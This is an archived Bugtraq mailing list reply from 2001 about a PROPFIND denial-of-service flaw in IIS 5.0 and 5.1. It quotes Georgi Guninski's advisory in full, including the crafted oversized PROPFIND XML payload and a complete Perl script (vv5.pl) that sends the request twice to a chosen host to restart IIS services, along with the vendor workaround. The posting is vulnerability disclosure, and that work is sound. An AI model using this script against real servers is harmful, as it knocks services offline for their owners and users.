Bugtraq mailing list archives
Re: IIS 5.0 PROPFIND DOS
From: Tiago Halm <thalm () MAIL TELEPAC PT>
Date: Sat, 10 Mar 2001 00:11:13 -0000
IIS 5.1, which ships with Whistler (build 2428) is also affected by this vulnerability. Microsoft's security bulletin MS01-016 http://www.microsoft.com/technet/security/bulletin/MS01-016.asp advises a workaround which I successfully tested against IIS 5.0 and IIS 5.1 and it works. Cheers, Tiago Halm -----Original Message----- From: Bugtraq List [mailto:BUGTRAQ () SECURITYFOCUS COM]On Behalf Of Georgi Guninski Sent: quinta-feira, 8 de Marco de 2001 10:51 To: BUGTRAQ () SECURITYFOCUS COM Subject: IIS 5.0 PROPFIND DOS Georgi Guninski security advisory #38, 2001 IIS 5.0 PROPFIND DOS Systems affected: IIS 5.0 Risk: Medium but may turn more serious Date: 8 March 2001 Legal Notice: This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission. Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. Description: It is possible to remotely restart all IIS related service using specially crafted request. It is also possible to force IIS to consume memory which it does not free. Seems to be a buffer overflow, don't know whether it is exploitable, let me know if you find a way to exploit it. Details: Basically the problem are very long but valid propfind request. For example the following PROPFIND request works for me: --------------------- <?xml version="1.0"?> <a:propfind xmlns:a="DAV:" xmlns:u="over:"><a:prop><a:displayname /><u:$over /></a:prop> </a:propfind> --------------------- where length($over) ~ 128008 The first time the request is send IIS replies with 500 ... Exception. The second time the services are restarted. --vv5.pl-------------------------------------------------------------------- ----- #!/usr/bin/perl # Written by Georgi Guninski use IO::Socket; print "IIS 5.0 propfind\n"; $port = @ARGV[1]; $host = @ARGV[0]; sub vv() { $ll=$_[0]; #length of buffer $ch=$_[1]; $over=$ch x $ll; #string to overflow $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return; #$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n"; # ^^^^ This is another issue and also works with length ~>65000 $xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n"; $l=length($xml); $req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n"; syswrite($socket,$req,length($req)); print "."; $socket->read($res,300); #print "r=".$res; close $socket; } do vv(128008,"V"); # may need to change the length sleep(1); do vv(128008,"V"); print "Done.\n"; --------------------------------------------------------------------------- Demonstration: Workoround: Disable WebDav extensions and PROPFIND though I do not recommend using IIS on the Internet. Vendor status: Microsoft was informed on 3 March 2001 Happy 8 March to the women. Regards, Georgi Guninski http://www.guninski.com
Current thread:
- IIS 5.0 PROPFIND DOS Georgi Guninski (Mar 08)
- Re: IIS 5.0 PROPFIND DOS Tiago Halm (Mar 08)
- <Possible follow-ups>
- Re: IIS 5.0 PROPFIND DOS Johansen, Eric (Mar 10)
- Re: IIS 5.0 PROPFIND DOS Tiago Halm (Mar 11)